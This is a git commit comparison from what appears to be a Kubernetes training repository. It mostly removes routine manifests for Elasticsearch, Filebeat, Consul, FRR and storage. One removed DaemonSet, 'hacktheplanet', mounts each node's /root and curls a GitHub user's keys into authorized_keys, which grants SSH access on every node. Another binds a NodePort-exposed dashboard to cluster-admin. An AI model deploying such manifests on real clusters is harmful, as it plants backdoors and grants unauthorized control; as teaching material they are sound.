Compare commits

..

2 Commits

Author SHA1 Message Date
Jerome Petazzoni
f01bc2a7a9 Fix overlapsing slide number and pics 2018-09-29 18:54:00 -05:00
Jerome Petazzoni
3eaa844c55 Add ENIX logo
Warning: do not merge this branch to your content, otherwise you
will get the ENIX logo in the top right of all your decks
2018-09-08 07:49:38 -05:00
271 changed files with 2399 additions and 47031 deletions

17
.gitignore vendored
View File

@@ -1,22 +1,13 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
node_modules
### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride
### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

View File

@@ -199,7 +199,7 @@ this section is for you!
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from losing your place if you get disconnected from servers.
prevent you from loosing your place if you get disconnected from servers.
https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -5,3 +5,6 @@ RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
--interval=1s --timeout=2s --retries=3 --start-period=1s \
CMD curl http://localhost/ || exit 1

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,90 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

View File

@@ -3,6 +3,7 @@ apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
@@ -18,6 +19,7 @@ rules:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -31,18 +33,23 @@ subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
template:
metadata:
labels:
app: fluentd
k8s-app: fluentd-logging
version: v1
kubernetes.io/cluster-service: "true"
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
@@ -51,7 +58,7 @@ spec:
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
image: fluent/fluentd-kubernetes-daemonset:elasticsearch
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
@@ -59,12 +66,12 @@ spec:
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
# X-Pack Authentication
# =====================
- name: FLUENT_ELASTICSEARCH_USER
value: "elastic"
- name: FLUENT_ELASTICSEARCH_PASSWORD
value: "changeme"
resources:
limits:
memory: 200Mi
@@ -85,83 +92,131 @@ spec:
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: elasticsearch
run: elasticsearch
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
spec:
containers:
- image: elasticsearch:5
- image: elasticsearch:5.6.8
imagePullPolicy: IfNotPresent
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: elasticsearch
run: elasticsearch
name: elasticsearch
selfLink: /api/v1/namespaces/default/services/elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
run: elasticsearch
sessionAffinity: None
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: null
generation: 1
labels:
app: kibana
run: kibana
name: kibana
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: kibana
run: kibana
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
image: kibana:5.6.8
imagePullPolicy: Always
name: kibana
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: kibana
run: kibana
name: kibana
selfLink: /api/v1/namespaces/default/services/kibana
spec:
externalTrafficPolicy: Cluster
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
run: kibana
sessionAffinity: None
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
hostPath:
path: /root
tolerations:
- effect: NoSchedule
operator: Exists
initContainers:
- name: hacktheplanet
image: alpine
volumeMounts:
- name: root
mountPath: /root
command:
- sh
- -c
- "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
containers:
- name: web
image: nginx

View File

@@ -1,18 +0,0 @@
global
daemon
maxconn 256
defaults
mode tcp
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
frontend the-frontend
bind *:80
default_backend the-backend
backend the-backend
server google.com-80 google.com:80 maxconn 32 check
server ibm.fr-80 ibm.fr:80 maxconn 32 check

View File

@@ -1,16 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: haproxy
spec:
volumes:
- name: config
configMap:
name: haproxy
containers:
- name: haproxy
image: haproxy
volumeMounts:
- name: config
mountPath: /usr/local/etc/haproxy/

View File

@@ -1,14 +0,0 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: cheddar
spec:
rules:
- host: cheddar.A.B.C.D.nip.io
http:
paths:
- path: /
backend:
serviceName: cheddar
servicePort: 80

View File

@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>
# ------------------- Dashboard Secret ------------------- #
apiVersion: v1
kind: Secret
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard-certs
namespace: kube-system
type: Opaque
---
# ------------------- Dashboard Service Account ------------------- #
apiVersion: v1
kind: ServiceAccount
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Role & Role Binding ------------------- #
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
rules:
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
resources: ["secrets"]
verbs: ["create"]
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["create"]
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
resources: ["secrets"]
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
verbs: ["get", "update", "delete"]
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
resources: ["configmaps"]
resourceNames: ["kubernetes-dashboard-settings"]
verbs: ["get", "update"]
# Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
resources: ["services"]
resourceNames: ["heapster"]
verbs: ["proxy"]
- apiGroups: [""]
resources: ["services/proxy"]
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: kubernetes-dashboard-minimal
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system
---
# ------------------- Dashboard Deployment ------------------- #
kind: Deployment
apiVersion: apps/v1beta2
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
k8s-app: kubernetes-dashboard
template:
metadata:
labels:
k8s-app: kubernetes-dashboard
spec:
containers:
- name: kubernetes-dashboard
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
ports:
- containerPort: 8443
protocol: TCP
args:
- --auto-generate-certificates
# Uncomment the following line to manually specify Kubernetes API server Host
# If not specified, Dashboard will attempt to auto discover the API server and connect
# to it. Uncomment only if the default does not work.
# - --apiserver-host=http://my-address:port
volumeMounts:
- name: kubernetes-dashboard-certs
mountPath: /certs
# Create on-disk volume to store exec logs
- mountPath: /tmp
name: tmp-volume
livenessProbe:
httpGet:
scheme: HTTPS
path: /
port: 8443
initialDelaySeconds: 30
timeoutSeconds: 30
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- name: tmp-volume
emptyDir: {}
serviceAccountName: kubernetes-dashboard
# Comment the following tolerations if Dashboard must not be deployed on master
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
---
# ------------------- Dashboard Service ------------------- #
kind: Service
apiVersion: v1
metadata:
labels:
k8s-app: kubernetes-dashboard
name: kubernetes-dashboard
namespace: kube-system
spec:
ports:
- port: 443
targetPort: 8443
selector:
k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: dashboard
name: dashboard
spec:
selector:
matchLabels:
app: dashboard
template:
metadata:
labels:
app: dashboard
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
image: alpine
name: dashboard
---
apiVersion: v1
kind: Service
metadata:
labels:
app: dashboard
name: dashboard
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: dashboard
type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,10 +0,0 @@
apiVersion: v1
Kind: Pod
metadata:
name: hello
namespace: default
spec:
containers:
- name: hello
image: nginx

View File

@@ -1,29 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: kaniko-build
spec:
initContainers:
- name: git-clone
image: alpine
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
git clone git://github.com/jpetazzo/container.training /workspace
volumeMounts:
- name: workspace
mountPath: /workspace
containers:
- name: build-image
image: gcr.io/kaniko-project/executor:latest
args:
- "--context=/workspace/dockercoins/rng"
- "--insecure"
- "--destination=registry:5000/rng-kaniko:latest"
volumeMounts:
- name: workspace
mountPath: /workspace
volumes:
- name: workspace

View File

@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
